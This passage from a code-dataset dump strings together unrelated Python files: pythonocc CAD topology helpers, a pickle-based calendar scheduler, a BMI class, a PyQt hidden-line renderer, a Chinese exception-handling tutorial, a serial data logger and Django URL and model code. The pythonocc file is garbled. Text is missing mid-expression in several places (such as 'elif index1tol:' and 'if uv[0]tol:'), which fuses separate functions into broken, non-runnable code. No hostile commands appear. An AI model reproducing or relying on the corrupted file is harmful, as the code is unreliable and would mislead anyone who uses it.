build_plugins()","repo_name":"OpenDroneMap/WebODM","sub_path":"app/management/commands/rebuildplugins.py","file_name":"rebuildplugins.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":2429,"dataset":"github-code","pt":"51"} +{"seq_id":"73983987357","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 9 15:07:47 2018\r\n\r\n@author: 3052180 Liang Sun\r\nuseful website for OCCD:\r\n====================================\r\nfile:///C:/pythonocc-core-0.18/doc/apidoc/0.18/search.html?q=D1&check_keywords=yes&area=default\r\nhttps://www.opencascade.com/doc/occt-6.9.1/refman/html/class_topo_d_s___shape.html\r\nhttps://www.opencascade.com/content/point-parameter\r\n====================================\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\n\r\nfrom OCC.gp import gp_Pnt, gp_Vec\r\nfrom OCC.ShapeAnalysis import ShapeAnalysis_Surface\r\nfrom OCC.BRep import BRep_Tool\r\nfrom OCC.STEPControl import STEPControl_Reader\r\nfrom OCC.IFSelect import IFSelect_RetDone, IFSelect_ItemsByEntity\r\nfrom OCC.GeomLProp import GeomLProp_SLProps \r\nfrom OCC.TopAbs import TopAbs_FORWARD,TopAbs_REVERSED\r\nfrom OCC.BRepTools import breptools\r\nfrom OCC.BRepAdaptor import BRepAdaptor_Curve\r\nfrom OCC.GCPnts import GCPnts_AbscissaPoint, GCPnts_AbscissaPoint_Length\r\nfrom OCC.BRepBuilderAPI import BRepBuilderAPI_MakeVertex\r\nfrom OCC.BRepExtrema import BRepExtrema_DistShapeShape\r\n\r\n\r\nfrom OCC.TDocStd import Handle_TDocStd_Document\r\nfrom OCC.XCAFApp import XCAFApp_Application\r\nfrom OCC.TCollection import TCollection_ExtendedString\r\nfrom OCC.XCAFDoc import (XCAFDoc_DocumentTool_ShapeTool,\r\n XCAFDoc_DocumentTool_ColorTool,\r\n XCAFDoc_DocumentTool_LayerTool,\r\n XCAFDoc_DocumentTool_MaterialTool,\r\n XCAFDoc_ColorSurf,XCAFDoc_ColorGen)\r\nfrom OCC.STEPCAFControl import STEPCAFControl_Reader\r\nfrom OCC.TDF import TDF_LabelSequence\r\nfrom OCC.Quantity import Quantity_Color,Quantity_TOC_RGB\r\nfrom OCC.ShapeFix import ShapeFix_Wireframe,ShapeFix_Shape\r\nfrom OCCD_Topo_Traverse import Topo\r\nfrom OCC.BRepGProp import brepgprop\r\nfrom OCC.GProp import GProp_GProps\r\n\r\nimport Python_Basic as PB\r\n\r\n\r\n#############################################################\r\n#### Topology #####\r\n#############################################################\r\n\r\n\r\n\r\ndef ask_face_wires(face, topo):\r\n \"\"\"\r\n This returns a list of wires(which is a loop of oriented edge). The first one is the boundary of the face.\r\n The followings (if has) are the inner loops.\r\n \"\"\"\r\n wireList=[]\r\n allWires=list(topo.wires_from_face(face))\r\n \r\n if len(allWires)==1:\r\n return allWires\r\n elif len(allWires)>1:\r\n outer=breptools.OuterWire(face)\r\n inners=[x for x in allWires if x!=outer]\r\n wireList.append(outer)\r\n wireList.extend(inners)\r\n return wireList\r\n else:\r\n print(\"Function: face_wires, the number of wires of the face is 0 \") \r\n return None\r\n\r\n\r\n\r\ndef get_edges_bounded_by_vertex_in_face(topo,vertex, face):\r\n \"\"\"\r\n \"\"\"\r\n boundingEdge=[]\r\n es1=list(topo.edges_from_vertex(vertex))\r\n es2=list(topo.edges_from_face(face))\r\n boundingEdge=PB.list_common(es1,es2)\r\n if len(boundingEdge)!=2:\r\n print(\"The vertex is not bounded by two edges\")\r\n return boundingEdge\r\n\r\n\r\ndef get_wire_of_edge_in_face(topo,edge, face):\r\n \"\"\"\r\n \"\"\"\r\n ws1=list(topo.wires_from_edge(edge))\r\n ws2=list(topo.wires_from_face(face))\r\n commonW=PB.list_common(ws1,ws2)\r\n return commonW[0]\r\n\r\n\r\ndef order_two_edges_in_wire(topo,wire,e1,e2):\r\n \"\"\"\r\n \"\"\"\r\n orderedE=list(topo.ordered_edges_from_wire(wire))\r\n \r\n index1=-1\r\n index2=-1\r\n firstE=None\r\n nextE=None\r\n \r\n for i in range(len(orderedE)):\r\n if orderedE[i]==e1:\r\n index1=i\r\n break\r\n for i in range(len(orderedE)):\r\n if orderedE[i]==e2:\r\n index2=i\r\n break\r\n \r\n if index1==0 and index2==len(orderedE)-1:\r\n firstE=e2\r\n nextE=e1\r\n elif index2==0 and index1==len(orderedE)-1:\r\n firstE=e1\r\n nextE=e2\r\n elif index1tol:\r\n uv[0]=uv[0]+geom_surface.UPeriod()\r\n if uv[0]>uvrange[1] and uv[0]-uvrange[1]>tol:\r\n uv[0]=uv[0]-geom_surface.UPeriod()\r\n\r\n \r\n if geom_surface.IsVPeriodic()==True:\r\n if uv[1]tol:\r\n uv[1]=uv[1]+geom_surface.VPeriod()\r\n if uv[1]>uvrange[3] and uv[1]-uvrange[3]>tol:\r\n uv[1]=uv[1]-geom_surface.VPeriod()\r\n# print(uv)\r\n return uv\r\n\r\n\r\n\r\n\r\n\r\ndef ask_point_uv2(xyz, face):\r\n \"\"\"\r\n This is a general function which gives the uv coordiates from the xyz coordinates.\r\n The uv value is not normlized.\r\n \"\"\"\r\n gpPnt=gp_Pnt(float(xyz[0]), float(xyz[1]), float(xyz[2]))\r\n surface=BRep_Tool().Surface(face) ### Handle_Geom_Surface\r\n\r\n sas=ShapeAnalysis_Surface(surface)\r\n gpPnt2D=sas.ValueOfUV(gpPnt,0.01)\r\n uv=list(gpPnt2D.Coord())\r\n\r\n return uv\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef ask_point_normal_face(uv,face):\r\n \"\"\"\r\n Ask the normal vector of a point given the uv coordinate of the point on a face\r\n \"\"\"\r\n surface=BRep_Tool().Surface(face)\r\n props=GeomLProp_SLProps(surface,uv[0],uv[1],1,1e-6)\r\n# GeomLProp_SLProps.SetParameters(surface,uv[0],uv[1])\r\n# GeomLProp_SLProps.SetSurface(surface)\r\n\r\n gpDir=props.Normal()#gp_Dir type\r\n if face.Orientation()==TopAbs_REVERSED:\r\n gpDir.Reverse()\r\n #print(\"face reversed\")\r\n return gpDir.Coord()\r\n\r\n\r\n\r\ndef corner_angle(topo, vertex, face):\r\n \"\"\"\r\n \"\"\"\r\n angle=0\r\n edges=get_edges_bounded_by_vertex_in_face(topo,vertex, face)\r\n if edges==[]: ### it is possible that a vertex of a superface is only a vertex of\r\n ### one of the hosts. In this case, for the other host faces, the angle should be 0\r\n return angle\r\n wire=get_wire_of_edge_in_face(topo,edges[0], face)\r\n [firstE,nextE]=order_two_edges_in_wire(topo,wire,edges[0],edges[1])\r\n \r\n result1=edge_extreme(firstE)\r\n result2=edge_extreme(nextE)\r\n \r\n parm1=ask_vertice_parm_edge(vertex,firstE)\r\n parm2=ask_vertice_parm_edge(vertex,nextE)\r\n# t1=ask_edge_tangent2(firstE,parm1)\r\n# t2=ask_edge_tangent2(nextE,parm2)\r\n# print(result1[1:])\r\n# print(result2[1:])\r\n# print(parm1)\r\n# print(parm2)\r\n# print(t1)\r\n# print(t2)\r\n\r\n if abs(parm1-result1[1])= hour)and(m > minut)) or (week > current_week) or ((week == current_week) and (d > day)) or ((week == current_week) and (d == day) and (h > hour))):\n if pages == 0 : break\n if self.table[d,current_pos] == 0:\n if pages > 60:\n pages = pages-60\n self.table[d,current_pos] = doc_nb\n else:\n pages = 0\n self.table[d,current_pos] = doc_nb\n return pages\n\nclass Calendar(object):\n def __init__(self,data_path):\n self.data_path = data_path\n \n def add_document(self,title,pages):\n \n doc = Document(title,pages)\n date = datetime.datetime.now()\n isocalendar = datetime.date(date.year, date.month, date.day).isocalendar()\n week_nb = isocalendar[1]\n day_nb = isocalendar[2] -1\n hour_nb = date.hour\n minut_nb = date.minute\n while doc.pages != 0:\n week_path = \"week_\"+str(week_nb)+\".pkl\"\n if os.path.exists(self.data_path+'/'+week_path):\n with open(self.data_path+'/'+week_path,'rb') as data:\n week = pickle.load(data) \n else :\n week = Week(week_nb)\n \n pages = week.addDocument(doc,minut_nb,hour_nb,day_nb,week_nb)\n self.save_week(week) \n doc = Document(title,pages)\n week_nb +=1\n print(pages)\n return pages\n \n def save_week(self,week):\n file = \"week_\"+str(week.week_nb)+\".pkl\"\n with open(self.data_path+'/'+file,'wb') as file:\n pickle.dump(week,file,pickle.HIGHEST_PROTOCOL)\n\n def get_week(self,week):\n for file in sorted(os.listdir(self.data_path)):\n if fnmatch.fnmatch(file,'week_[0123456789][0123456789].pkl'):\n if (int(file[5:7]) == week):\n print(week)\n with open(self.data_path+'/'+file,'rb') as data:\n week = pickle.load(data)\n return week.table\n return 0\n \n def get_docs(self,week):\n for file in sorted(os.listdir(self.data_path)):\n if fnmatch.fnmatch(file,'week_[0123456789][0123456789].pkl'):\n if (int(file[5:7]) == week):\n print(week)\n with open(self.data_path+'/'+file,'rb') as data:\n week = pickle.load(data)\n return week.docs\n return 0\n \n def list_weeks(self):\n list = []\n for file in sorted(os.listdir(self.data_path)):\n if fnmatch.fnmatch(file,'week_[0123456789][0123456789].pkl'):\n list.append(file[5:7])\n return list\n\n def reset(self):\n for file in sorted(os.listdir(self.data_path)):\n if fnmatch.fnmatch(file,'week_[0123456789][0123456789].pkl'):\n os.remove(self.data_path+\"/\"+file)\n\n","repo_name":"chefmtt/chatbot-sdia","sub_path":"agenda.py","file_name":"agenda.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42991008216","text":"# 物件導向 - 練習\nclass Person :\n # 定義專屬技能 init\n # 節省設定資料的程式碼\n def __init__(self, n, h, w):\n self.name = n\n self.height = h\n self.weight = w\n\n def bmi(self,**kwargs):\n bmi = self.weight / (self.height / 100) ** 2\n if \"rounded\" in kwargs :\n return round(bmi,kwargs[\"rounded\"])\n else :\n return bmi\n\np1 = Person(\"Elwing\",175,85)\nprint(p1.name,p1.bmi(rounded=3))\np2 = Person(\"Fiamma\",172,60)\nprint(p2.name,p2.bmi(rounded=3))\n\n","repo_name":"fiamma66/python-basic","sub_path":"workplace-practice/main6.py","file_name":"main6.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13158007153","text":"import math\nimport numpy as np\nfrom itertools import combinations, chain, permutations\nfrom functools import reduce\nfrom scipy.optimize import linprog\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QWidget, QApplication\nfrom PyQt5.QtGui import QPainter, QPen, QPolygon, QBrush, QFont, QMouseEvent\nfrom PyQt5.QtCore import Qt, QPoint, QRect, QLine, QTimer\nimport sys\n\nnp.set_printoptions(precision=2)\nEPSILON = 0.000001\n\nclass FifthTask(QWidget):\n def __init__(self):\n super().__init__()\n self.setGeometry(100, 100, 800, 800)\n\n self.x1 = -4\n self.x2 = 4\n self.y1 = -4\n self.y2 = 4\n\n square = [([1.2, 1.2, 1.2], [0, 2, 5]),\n ([-1.2, 1.2, 1.2], [0, 1, 2]),\n ([1.2, -1.2, 1.2], [2, 3, 5]),\n ([1.2, 1.2, -1.2], [0, 4, 5]),\n ([-1.2, -1.2, 1.2], [1, 2, 3]),\n ([-1.2, 1.2, -1.2], [0, 1, 4]),\n ([1.2, -1.2, -1.2], [3, 4, 5]),\n ([-1.2, -1.2, -1.2], [1, 3, 4])]\n\n tetra = [([3, 0, 0], [0, 1, 2]),\n ([0, 0.5, 0.5], [0, 1, 3]),\n ([0, -0.5, 0.5], [0, 2, 3]),\n ([0, 0.5, -0.5], [1, 2, 3])]\n\n square2 = [([1, 1.5, 1], [0, 2, 5]),\n ([-1, 1.5, 1], [0, 1, 2]),\n ([1, -1.5, 1], [2, 3, 5]),\n ([1, 1.5, -1], [0, 4, 5]),\n ([-1, -1.5, 1], [1, 2, 3]),\n ([-1, 1.5, -1], [0, 1, 4]),\n ([1, -1.5, -1], [3, 4, 5]),\n ([-1, -1.5, -1], [1, 3, 4])]\n\n square3 = [([2, 1, 1.5], [0, 2, 5]),\n ([0, 1, 1.5], [0, 1, 2]),\n ([2, -1, 1.5], [2, 3, 5]),\n ([2, 1, -1.5], [0, 4, 5]),\n ([0, -1, 1.5], [1, 2, 3]),\n ([0, 1, -1.5], [0, 1, 4]),\n ([2, -1, -1.5], [3, 4, 5]),\n ([0, -1, -1.5], [1, 3, 4])]\n\n self.point_shapes = [square2, square3, square, tetra]\n\n self.rotation_angle_x = 0\n self.rotation_angle_y = 0\n self.rotation_angle_z = 0\n self.redraw()\n\n self.init_ui()\n\n def make_normal_vectior_point_outside(self, centroid, plane):\n if np.array(plane).dot(np.append(centroid, 1)) < EPSILON:\n return (plane * -1)\n return plane\n\n def redraw(self):\n self.intersections_with_view_planes = []\n self.transformed_point_shapes = []\n self.lines_to_draw = []\n self.black_points = []\n self.visible_edges = [[] for _ in range(len(self.point_shapes))]\n self.transformed_plane_shapes = [[] for _ in range(len(self.point_shapes))]\n self.visible_plane_shapes = [[] for _ in range(len(self.point_shapes))]\n self.intersections_with_sides_shapes = [[] for _ in range(len(self.point_shapes))]\n\n for p_shape in self.point_shapes:\n t = list(map(self.transform, p_shape))\n self.transformed_point_shapes.append(list(map(lambda p: (p[0][:3], p[1]), t)))\n\n\n for index, p_shape in enumerate(self.transformed_point_shapes):\n plane_ids = set().union(*list(map(lambda p: p[1], p_shape)))\n centroid = np.array(reduce(lambda a, x: a + x[0], np.array(p_shape), np.zeros(3))) / len(p_shape)\n for id in plane_ids:\n plane_points = list(filter(lambda p: id in p[1], p_shape))\n plane = np.array(self.get_plane_from_3_points(*[p[0] for p in plane_points]))\n plane = self.make_normal_vectior_point_outside(centroid, plane)\n if np.dot(plane, [0, 0, -1, 0]) > EPSILON:\n self.visible_plane_shapes[index].append(plane)\n for p1, p2 in combinations(plane_points, 2):\n if len(set(p1[1]).intersection(p2[1]).difference(list([id]))):\n self.visible_edges[index].append([[p1[0][:3], p2[0][:3]], []])\n self.transformed_plane_shapes[index].append(plane)\n self.transformed_plane_shapes[index] = np.array(self.transformed_plane_shapes[index]).transpose()\n\n # p = 0\n for i in range(len(self.point_shapes)):\n for j in range(len(self.point_shapes)):\n if i == j: continue\n planes = np.array(self.transformed_plane_shapes[i]).transpose()\n for line in self.visible_edges[j][:]:\n for plane in planes:\n p1, p2 = line[0]\n intersection, t = self.linePlaneIntersection(p1, p2, plane, [0 + EPSILON*2, 1 - EPSILON*2])\n if intersection is not None:\n dot = np.dot(list(filter(lambda p: not np.array_equal(plane, p), planes.tolist())), np.append(intersection, 1))\n if not any(map(lambda p: p < -EPSILON, dot)):\n self.intersections_with_sides_shapes[j].append(intersection)\n line[1].append(t)\n\n # 0 < t < 1\n for i in range(len(self.point_shapes)):\n for j in range(len(self.point_shapes)):\n if i == j: continue\n for line1 in self.visible_edges[i]:\n for line2 in self.visible_edges[j][:]:\n t, intersection = self.view_plane_line_intercection(line1[0], line2[0])\n if t:\n # self.intersections_with_view_planes.append(intersection)\n line1[1].append(t)\n\n # # # adding intersection edges\n self.visible_edges.append(list(map(lambda line: (line, []),\n list(filter(lambda line: self.is_line_visible(line),\n permutations(chain(*self.intersections_with_sides_shapes), 2))))))\n\n # t = 0, 1\n for i in range(len(self.point_shapes)):\n for j in range(len(self.point_shapes)+1):\n if i == j: continue\n planes = np.array(self.transformed_plane_shapes[i]).transpose()\n for plane in planes:\n for line in self.visible_edges[j][:]:\n p1, p2 = line[0]\n\n intersection, t = self.linePlaneIntersection(p1, p1 + np.array([0, 0, 1]), plane, [0, float('inf')])\n if intersection is not None and abs(t) > EPSILON:\n dot = np.dot(list(filter(lambda p: not np.array_equal(plane, p), planes.tolist())), np.append(intersection, 1))\n if not any(map(lambda p: p < EPSILON, dot)):\n self.intersections_with_view_planes.append(intersection)\n line[1].append(0)\n\n intersection, t = self.linePlaneIntersection(p2, p2 + np.array([0, 0, 1]), plane, [0, float('inf')])\n if intersection is not None and abs(t) > EPSILON:\n dot = np.dot(list(filter(lambda p: not np.array_equal(plane, p), planes.tolist())),\n np.append(intersection, 1))\n if not any(map(lambda p: p < EPSILON, dot)):\n self.intersections_with_view_planes.append(intersection)\n line[1].append(1)\n\n\n\n\n self.lines_to_draw = list(chain(*map(lambda edge: self.get_line_minmax(edge), chain(*self.visible_edges))))\n\n self.update()\n\n def linePlaneIntersection(self, p1, p2, plane, interval):\n # https://stackoverflow.com/a/7170101/7868408\n plane = np.array(plane)\n normal = plane[:3]\n if plane[2]:\n coord = np.array([0,0, -plane[3]/plane[2]])\n elif plane[1]:\n coord = np.array([0, -plane[3] / plane[1], 0])\n else:\n coord = np.array([-plane[3] / plane[0], 0, 0])\n ray = np.array(p2) - np.array(p1)\n d = np.dot(normal, coord)\n if abs(np.dot(normal, ray)) < EPSILON:\n return None, None\n x = (d - np.dot(normal, p1))/np.dot(normal, ray)\n\n intersection = p1 + ray*x\n if interval[0] - EPSILON <= x <= interval[1] + EPSILON:\n return intersection, x\n return None, None\n\n def normalize(self, v):\n norm = np.linalg.norm(v)\n if norm == 0:\n return v\n return v / norm\n\n def get_plane_from_3_points(self, point1, point2, point3, *ignored):\n x1, y1, z1 = point1\n x3, y3, z3 = point3\n x2, y2, z2 = point2\n vector1 = [x2 - x1, y2 - y1, z2 - z1]\n vector2 = [x3 - x1, y3 - y1, z3 - z1]\n\n cross_product = [vector1[1] * vector2[2] - vector1[2] * vector2[1],\n -1 * (vector1[0] * vector2[2] - vector1[2] * vector2[0]),\n vector1[0] * vector2[1] - vector1[1] * vector2[0]]\n\n a = cross_product[0]\n b = cross_product[1]\n c = cross_product[2]\n d = - (cross_product[0] * x1 + cross_product[1] * y1 + cross_product[2] * z1)\n\n\n return (a, b, c, d)\n\n def get_line_minmax(self, line):\n v = np.array(line[0][1]) - np.array(line[0][0])\n if len(set(line[1])) > 1:\n p1 = line[0][0] + min(line[1]) * v\n p2 = line[0][0] + max(line[1]) * v\n result = [[line[0][0], p1], [p2, line[0][1]]]\n return list(filter(lambda p: not np.array_equal(p[0], p[1]), result))\n elif len(set(line[1])) == 1:\n return []\n return [line[0]]\n\n def is_line_visible(self, line):\n middle = np.array(self.get_middle_point(line))\n for shape in self.transformed_plane_shapes:\n planes = np.array(shape).transpose()\n dot = np.dot(planes, np.append(middle, 1))\n if all(map(lambda p: p > EPSILON, dot)):\n return False\n for plane in chain(*self.visible_plane_shapes):\n intersection, t = self.linePlaneIntersection(middle, middle + np.array([0, 0, 1]), plane, [2*EPSILON+0, float('inf')])\n if intersection is not None:\n dot = np.dot(list(filter(lambda p: not np.array_equal(plane, p), planes.tolist())),\n np.append(intersection, 1))\n if not any(map(lambda p: p < EPSILON, dot)):\n return False\n return True\n\n\n def get_middle_point(self, line):\n A = np.array(line[0])\n B = np.array(line[1])\n return ((B - A) / 2) + A\n\n def view_plane_line_intercection(self, view_line, line):\n A = np.array(view_line[0])\n B = np.array(view_line[1])\n D = np.array([0, 0, 1])\n C = np.array(line[1]) - np.array(line[0])\n matrix = np.array([B - A, D, -C]).transpose()\n\n right_handside = np.array(np.array(line[0]) - A)\n try:\n t, p, s = np.linalg.solve(matrix, right_handside)\n if (0 <= t <= 1 and p >= 0 and 0 <= s <= 1):\n new = (np.array(line[0]) + C * s)\n return t, new\n except:\n return None, None\n return None, None\n\n def distance(self, point1, point2):\n p = np.array(point1) - np.array(point2)\n return math.sqrt(np.dot(p, p))\n\n def init_ui(self):\n self.setWindowTitle('Fifth Task')\n p = self.palette()\n p.setColor(self.backgroundRole(), Qt.white)\n self.setPalette(p)\n self.show()\n\n def paintEvent(self, e):\n qp = QPainter()\n qp.begin(self)\n font = QFont()\n font.setPixelSize(10)\n qp.setFont(font)\n self.draw_shape(qp)\n qp.end()\n\n def draw_shape(self, qp: QPainter):\n qp.setPen(QPen(Qt.blue, 1, Qt.SolidLine))\n # helpers\n qp.drawText(QPoint(0, 10),\n 'rotaion: ' + str(np.array([self.rotation_angle_x, self.rotation_angle_y, self.rotation_angle_z])))\n for line in self.lines_to_draw:\n qp.drawLine(self.plane_to_screen(line[0]), self.plane_to_screen(line[1]))\n # helpers\n # qp.drawText(self.plane_to_screen(line[0]), str(np.array(line[0])))\n # qp.drawText(self.plane_to_screen(line[1]), str(np.array(line[1])))\n\n # helpers\n # qp.setPen(QPen(Qt.red, 3, Qt.SolidLine))\n # for point in self.intersections_with_view_planes:\n # qp.drawPoint(self.plane_to_screen(point))\n # qp.drawText(self.plane_to_screen(point), str(np.array(point)))\n\n # qp.setPen(QPen(Qt.green, 3, Qt.SolidLine))\n # for point in chain(*self.intersections_with_sides_shapes):\n # qp.drawPoint(self.plane_to_screen(point))\n # qp.drawText(self.plane_to_screen(point), str(np.array(point)))\n\n # qp.setPen(QPen(Qt.black, 3, Qt.SolidLine))\n # for point in self.black_points:\n # qp.drawPoint(self.plane_to_screen(point))\n # qp.drawText(self.plane_to_screen(point), str(np.array(point)))\n\n def plane_to_screen(self, v):\n xp, yp = self.front_projection(v)\n xx = round((xp - self.x1) * self.geometry().width() / (self.x2 - self.x1))\n yy = self.geometry().height() - round((yp - self.y1) * self.geometry().height() / (self.y2 - self.y1))\n return QPoint(xx, yy)\n\n def front_projection(self, v):\n return v[0], v[1]\n\n def transform(self, point):\n m = point[0]\n if len(m) == 3:\n m = np.append(m, [0])\n return self.rotation_z(self.rotation_y(self.rotation_x(m))), point[1]\n\n def rotation_x(self, m):\n angle = self.rotation_angle_x\n rot_matrix = np.array([\n [1, 0, 0, 0],\n [0, math.cos(angle), math.sin(angle), 0],\n [0, -math.sin(angle), math.cos(angle), 0],\n [0, 0, 0, 1],\n ])\n return np.dot(np.linalg.inv(rot_matrix), m)\n\n def rotation_y(self, m):\n angle = self.rotation_angle_y\n rot_matrix = np.array([\n [math.cos(angle), 0, -math.sin(angle), 0],\n [0, 1, 0, 0],\n [math.sin(angle), 0, math.cos(angle), 0],\n [0, 0, 0, 1],\n ])\n\n return np.dot(np.linalg.inv(rot_matrix), m)\n\n def rotation_z(self, m):\n angle = self.rotation_angle_z\n rot_matrix = np.array([\n [math.cos(angle), math.sin(angle), 0, 0],\n [-math.sin(angle), math.cos(angle), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1],\n ])\n\n return np.dot(np.linalg.inv(rot_matrix), m)\n\n def keyPressEvent(self, event):\n if event.key() == QtCore.Qt.Key_S:\n self.rotation_angle_x += 0.1\n elif event.key() == QtCore.Qt.Key_W:\n self.rotation_angle_x -= 0.1\n\n elif event.key() == QtCore.Qt.Key_D:\n self.rotation_angle_y += 0.1\n elif event.key() == QtCore.Qt.Key_A:\n self.rotation_angle_y -= 0.1\n\n elif event.key() == QtCore.Qt.Key_Q:\n self.rotation_angle_z += 0.1\n elif event.key() == QtCore.Qt.Key_E:\n self.rotation_angle_z -= 0.1\n else:\n return\n self.redraw()\n\n\ndef my_exception_hook(exctype, value, traceback):\n print(exctype, value, traceback)\n sys._excepthook(exctype, value, traceback)\n sys.exit(1)\n\n\nif __name__ == '__main__':\n sys._excepthook = sys.excepthook\n sys.excepthook = my_exception_hook\n app = QApplication(sys.argv)\n ex = FifthTask()\n sys.exit(app.exec_())\n","repo_name":"evilPaprika/computer-graphics-and-geometry","sub_path":"fifth_task.py","file_name":"fifth_task.py","file_ext":"py","file_size_in_byte":15452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"1519641447","text":" \nimport logging # Python内置的日志\n\ntry:\n\tprint('try...')\n\ta = 10 / int('1')\n\tprint('result: %d' % a)\nexcept ValueError as e:\n\tprint('ValueError except:', e)\nexcept ZeroDivisionError as e:\n\tprint('ZeroDivisionError except:', e)\nelse:\n\tprint('no error')\nfinally:\n\tprint('finally....')\n\nprint('END')\n\n# Python的错误其实也是class,所有的错误类型都继承自BaseException,所以在使用except时需要注意的是,它不但捕获该类型的错误,还把其子类也“一网打尽”。比如:\n\n# try:\n# foo()\n# except ValueError as e:\n# print('ValueError')\n# except UnicodeError as e:\n# print('UnicodeError')\n\n# 第二个except永远也捕获不到UnicodeError,因为UnicodeError是ValueError的子类,如果有,也被第一个except给捕获了。\n\nprint('------------------------------')\n# 使用try...except捕获错误还有一个巨大的好处,就是可以跨越多层调用,\n# 比如函数main()调用foo(),foo()调用bar(),结果bar()出错了,这时,只要main()捕获到了,就可以处理\n# 也就是说,不需要在每个可能出错的地方去捕获错误,只要在合适的层次去捕获错误就可以了。这样一来,就大大减少了写try...except...finally的麻烦。\n\ndef foo(s):\n\treturn 10 / int(s)\n\ndef bar(s):\n\treturn foo(s) * 2\n\ndef main():\n\ttry:\n\t\tbar('0')\n\texcept Exception as e:\n\t\tlogging.exception(e)\n\tfinally:\n\t\tprint('finally...')\n\nmain()\n\n# 自定义Exception,然后抛出异常\nclass FooError(ValueError):\n\tpass\n\n# def foo(s):\n# \tn = int(s)\n# \tif n == 0:\n# \t\traise FooError('invalid value: %s' % s)\n# \treturn 10 / n\n\n# foo('0')\n\n# err_reraise.py\n\ndef foo(s):\n n = int(s)\n if n==0:\n raise ValueError('invalid value: %s' % s)\n return 10 / n\n\ndef bar():\n try:\n foo('0')\n except ValueError as e:\n print('ValueError!') # 只是为了记录一下\n raise # 统一往上报,在最上层处理\n\n# bar()\n\n#其实这种错误处理方式不但没病,而且相当常见。捕获错误目的只是记录一下,便于后续追踪。但是,由于当前函数不知道应该怎么处理该错误,所以,最恰当的方式是继续往上抛,让顶层调用者去处理\n\n# raise语句如果不带参数,就会把当前错误原样抛出。此外,在except中raise一个Error,还可以把一种类型的错误转化成另一种类型:\n\ntry:\n 10 / 0\nexcept ZeroDivisionError:\n raise ValueError('input error!')\n","repo_name":"ianzhengnan/learnpy","sub_path":"renew/errorhandling/errorhandling.py","file_name":"errorhandling.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"37509683988","text":"#!/usr/bin/python3\n\n# tested with Python 3.6.5 (default, Apr 1 2018, 05:46:30) \nimport serial, datetime, time\nimport termios # strange USB serial vodoo\n\npath = \"/home/pi/FMES/\" # path to log file\n\n# device='/dev/ttyACM0' # Teensy 3.2\ndevice='/dev/ttyUSB0' # USB-serial device\n#baudrate=57600 # serial device baud rate\nbaudrate=115200 # serial device baud rate\n\nFLIM = 100 # flush buffer after writing this many lines\n\n# time.sleep(45) # when run at bootup, delay to make sure network time has been set\n\nt = datetime.datetime.utcnow()\nts = t.strftime(\"%y%m%d_%H%M%S\") # for example: 190516_183009\nfname = path + ts + \"_FMES.csv\" # data log filename with start date/time\nf = open(fname, 'w') # open log file\n\nfctr = FLIM - 5 # saved-line counter (flush buffer after FLIM lines, except at start)\npctr = 5 # sample decimation counter \nfirstline = 1 # have not yet finished the first line\n\nf.write(\"ADC1, Range1, ADC2, Range2\\n\") # write CSV file column header\noline = \"# Start: \" + str(datetime.datetime.utcnow()) + \" UTC \\n\"\nf.write(oline)\nf.write(\"# ADS1115 Diff 01+23 channels 2019-04-07 JPB\\n\")\n\noldm = int(time.time()/60.0) # time.time() = floating-point seconds since epoch\n\nwith serial.Serial(device, baudrate, timeout=1) as ser:\n oline = \"# \" + str(ser) + \"\\n\" # DEBUG: show state of serial port\n f.write(oline) # debug\n f.flush()\n for i in range(2):\n line = ser.readline()\n print(line) # DEBUG: show raw input line of text\n\n while True:\n line = ser.readline()\n # print(line) # DEBUG: show raw input line of text\n s0 = line.decode(\"utf-8\").strip() # bytes to string, without start/end whitespace\n s = s0.strip('\\0') # serial port open sometimes gives a null byte\n nc = len(s) # how many useful characters in the input string?\n s = s\n if ( nc > 0 ):\n m = int(time.time()/60.0) # time.time() = floating-point seconds since epoch\n f.write(s)\n if (m != oldm): # minute marker at top of each minute\n oline = \", \" + str(datetime.datetime.utcnow())\n f.write(oline)\n oldm=m\n\n f.write(\"\\n\")\n fctr += 1\n if (fctr > FLIM):\n f.flush()\n fctr = 0\n # print(s,end='')\n","repo_name":"jbeale1/DataAcq","sub_path":"FMES-log.py","file_name":"FMES-log.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"33682497370","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom .views import ContactFormView\n\nurlpatterns = patterns(\n '',\n url(r'^us/$',\n ContactFormView.as_view(),\n name='contact'),\n url(r'^sent/$',\n TemplateView.as_view(template_name='sent.html'),\n name='sent'),\n)\n","repo_name":"wbtuomela/fundus","sub_path":"dico/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23307616485","text":"from django.db import models\nfrom users.models import CustomUser\nclass Exam(models.Model):\n user =models.ForeignKey(CustomUser,on_delete=models.CASCADE, related_name=\"exams\")\n name = models.CharField(max_length=200, blank=True, null=True)\n\nclass Section(models.Model):\n name = models.CharField(max_length=200, blank=True, null=True)\n exam = models.ForeignKey(Exam,on_delete=models.CASCADE, related_name=\"sections\")\n\nclass Topic(models.Model):\n name = models.CharField(max_length=200, blank=True, null=True)\n section = models.ForeignKey(Section,on_delete=models.CASCADE, related_name=\"topics\")\n\nclass Quiz(models.Model):\n name = models.CharField(max_length=200, blank=True, null=True)\n topic = models.ForeignKey(Topic,on_delete=models.CASCADE, related_name=\"quizes\")\n\n\nclass Question(models.Model):\n quiz = models.ForeignKey(Quiz,on_delete=models.CASCADE, related_name=\"questions\")\n question = models.TextField(null=True, blank = True)\n image = models.ImageField(upload_to='quiz_images/', blank=True, null=True)\n option_1 = models.CharField(max_length=200)\n 